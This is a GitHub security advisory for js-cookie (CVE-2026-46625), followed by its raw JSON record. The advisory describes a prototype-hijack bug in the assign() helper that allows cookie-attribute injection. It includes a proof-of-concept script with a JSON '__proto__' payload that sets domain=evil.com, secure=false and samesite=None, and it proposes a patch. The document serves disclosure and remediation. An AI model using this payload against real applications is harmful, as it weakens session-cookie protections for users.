Search criteria
Related vulnerabilities
GHSA-QJX8-664M-686J
Vulnerability from github – Published: 2026-05-21 21:20 – Updated: 2026-05-21 21:20
VLAI
Summary
JavaScript Cookie: Per-instance prototype hijack in assign() enables cookie-attribute injection
Details
Summary
js-cookie's internal assign() helper copies properties with for...in + plain assignment. When the source object is produced by JSON.parse, the JSON object's "__proto__" member is an own enumerable property, so the for…in enumerates it and the target[key] = source[key] write triggers the Object.prototype.__proto__ setter on the fresh target ({}). The result is a per-instance prototype hijack: Object.prototype itself is untouched, but the merged attributes object now inherits attacker-controlled keys.
Because the consuming set() function then enumerates the merged object with another for...in, every key the attacker placed on the polluted prototype lands in the resulting Set-Cookie string as an attribute pair. The attacker can set domain=, secure=, samesite=, expires=, and path= on cookies whose attributes the developer thought were locked down.
Impact
Any application that forwards a JSON-derived object as the attributes argument to Cookies.set, Cookies.remove, Cookies.withAttributes, or Cookies.withConverter is vulnerable. This is the standard pattern when cookie configuration comes from a backend:
const cfg = await fetch('/config').then(r => r.json());
Cookies.set('session', token, cfg.cookieAttrs); // cfg.cookieAttrs influenced by attacker
A payload of {"__proto__":{"domain":"evil.example","secure":"false","samesite":"None"}} causes js-cookie to emit:
Set-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None
Affected code
// src/assign.mjs — full file
export default function (target) {
for (var i = 1; i < arguments.length; i++) {
var source = arguments[i]
for (var key in source) { // includes own enumerable '__proto__'
target[key] = source[key] // [[Set]] form - fires __proto__ setter
}
}
return target
}
Proof of concept
Node 22.11.0, no third-party deps:
Environment setup
mkdir -p /tmp/jscookie-poc && cd /tmp/jscookie-poc
npm init -y
npm i js-cookie
PoC
ubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs
let lastSetCookie = '';
globalThis.document = {
get cookie() { return ''; },
set cookie(v) { lastSetCookie = v; }
};
const { default: Cookies } = await import('js-cookie');
const attackerAttrs = JSON.parse(
'{"__proto__":{"secure":"false","domain":"evil.com","samesite":"None","expires":-1}}'
);
Cookies.set('session', 'TOKEN', attackerAttrs);
console.log('Set-Cookie that js-cookie wrote to document.cookie:');
console.log(lastSetCookie);
Execution:
Suggested patch
--- a/src/assign.mjs
+++ b/src/assign.mjs
@@
export default function (target) {
for (var i = 1; i < arguments.length; i++) {
var source = arguments[i]
- for (var key in source) {
- target[key] = source[key]
- }
+ for (var key in source) {
+ if (key === '__proto__' || key === 'constructor' || key === 'prototype') continue
+ Object.defineProperty(target, key, {
+ value: source[key],
+ writable: true,
+ enumerable: true,
+ configurable: true,
+ })
+ }
}
return target
}
Equivalent one-liner alternative - iterate own names only and filter:
for (const key of Object.getOwnPropertyNames(source)) {
if (key === '__proto__') continue
target[key] = source[key]
}
Severity
7.5 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.5"
},
"package": {
"ecosystem": "npm",
"name": "js-cookie"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46625"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-21T21:20:31Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\n`js-cookie`\u0027s internal `assign()` helper copies properties with `for...in` + plain assignment. When the source object is produced by `JSON.parse`, the JSON object\u0027s `\"__proto__\"` member is an *own enumerable* property, so the `for\u2026in` enumerates it and the `target[key] = source[key]` write triggers the **`Object.prototype.__proto__` setter** on the fresh `target` (`{}`). The result is a per-instance prototype hijack: `Object.prototype` itself is untouched, but the merged `attributes` object now inherits attacker-controlled keys.\n\nBecause the consuming `set()` function then enumerates the merged object with another `for...in`, every key the attacker placed on the polluted prototype lands in the resulting `Set-Cookie` string as an attribute pair. The attacker can set `domain=`, `secure=`, `samesite=`, `expires=`, and `path=` on cookies whose attributes the developer thought were locked down.\n\n## Impact\n\nAny application that forwards a JSON-derived object as the `attributes` argument to `Cookies.set`, `Cookies.remove`, `Cookies.withAttributes`, or `Cookies.withConverter` is vulnerable. This is the standard pattern when cookie configuration comes from a backend:\n\n```js\nconst cfg = await fetch(\u0027/config\u0027).then(r =\u003e r.json());\nCookies.set(\u0027session\u0027, token, cfg.cookieAttrs); // cfg.cookieAttrs influenced by attacker\n```\n\nA payload of `{\"__proto__\":{\"domain\":\"evil.example\",\"secure\":\"false\",\"samesite\":\"None\"}}` causes js-cookie to emit:\n\n```\nSet-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None\n```\n\n## Affected code\n\n```js\n// src/assign.mjs \u2014 full file\nexport default function (target) {\n for (var i = 1; i \u003c arguments.length; i++) {\n var source = arguments[i]\n for (var key in source) { // includes own enumerable \u0027__proto__\u0027\n target[key] = source[key] // [[Set]] form - fires __proto__ setter\n }\n }\n return target\n}\n```\n## Proof of concept\n\nNode 22.11.0, no third-party deps:\n\n### Environment setup\n```bash\nmkdir -p /tmp/jscookie-poc \u0026\u0026 cd /tmp/jscookie-poc\nnpm init -y\nnpm i js-cookie\n```\n\n### PoC\n```js\nubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs\nlet lastSetCookie = \u0027\u0027;\nglobalThis.document = {\n get cookie() { return \u0027\u0027; },\n set cookie(v) { lastSetCookie = v; }\n};\n\nconst { default: Cookies } = await import(\u0027js-cookie\u0027);\n\nconst attackerAttrs = JSON.parse(\n \u0027{\"__proto__\":{\"secure\":\"false\",\"domain\":\"evil.com\",\"samesite\":\"None\",\"expires\":-1}}\u0027\n);\n\nCookies.set(\u0027session\u0027, \u0027TOKEN\u0027, attackerAttrs);\n\nconsole.log(\u0027Set-Cookie that js-cookie wrote to document.cookie:\u0027);\nconsole.log(lastSetCookie);\n```\n\nExecution:\n\u003cimg width=\"2614\" height=\"1174\" alt=\"cls-2026-05-14-01 44 39\" src=\"https://github.com/user-attachments/assets/120df1fe-7e97-4ca3-904e-ab80d71ecf62\" /\u003e\n\n## Suggested patch\n\n```diff\n--- a/src/assign.mjs\n+++ b/src/assign.mjs\n@@\n export default function (target) {\n for (var i = 1; i \u003c arguments.length; i++) {\n var source = arguments[i]\n- for (var key in source) {\n- target[key] = source[key]\n- }\n+ for (var key in source) {\n+ if (key === \u0027__proto__\u0027 || key === \u0027constructor\u0027 || key === \u0027prototype\u0027) continue\n+ Object.defineProperty(target, key, {\n+ value: source[key],\n+ writable: true,\n+ enumerable: true,\n+ configurable: true,\n+ })\n+ }\n }\n return target\n }\n```\n\nEquivalent one-liner alternative - iterate own names only and filter:\n\n```js\nfor (const key of Object.getOwnPropertyNames(source)) {\n if (key === \u0027__proto__\u0027) continue\n target[key] = source[key]\n}\n```",
"id": "GHSA-qjx8-664m-686j",
"modified": "2026-05-21T21:20:31Z",
"published": "2026-05-21T21:20:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/js-cookie/js-cookie/security/advisories/GHSA-qjx8-664m-686j"
},
{
"type": "PACKAGE",
"url": "https://github.com/js-cookie/js-cookie"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "JavaScript Cookie: Per-instance prototype hijack in assign() enables cookie-attribute injection"
}